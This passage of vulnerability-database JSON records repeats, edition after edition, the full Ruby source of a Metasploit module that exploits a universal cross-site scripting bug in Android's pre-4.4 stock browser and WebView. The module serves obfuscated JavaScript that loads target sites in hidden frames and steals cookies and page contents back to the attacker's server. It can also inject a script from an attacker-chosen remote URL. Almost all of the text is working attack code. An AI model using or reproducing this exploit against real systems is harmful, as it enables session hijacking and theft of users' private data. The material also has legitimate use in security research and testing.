If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-28T09:52:29", "differentElements": ["modified", "published"], "edition": 22}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-28T11:49:17", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-28T11:49:17"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-28T11:49:17", "differentElements": ["modified", "published"], "edition": 23}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-03T14:46:27", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-03T14:46:27"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-03T14:46:27", "differentElements": ["modified", "published"], "edition": 24}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-03T18:04:21", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-03T18:04:21"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-03T18:04:21", "differentElements": ["modified", "published"], "edition": 25}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-07T10:14:19", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-07T10:14:19"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-07T10:14:19", "differentElements": ["modified", "published"], "edition": 26}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-07T14:12:19", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-07T14:12:19"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-07T14:12:19", "differentElements": ["modified", "published"], "edition": 27}, {"bulletin": {"id": 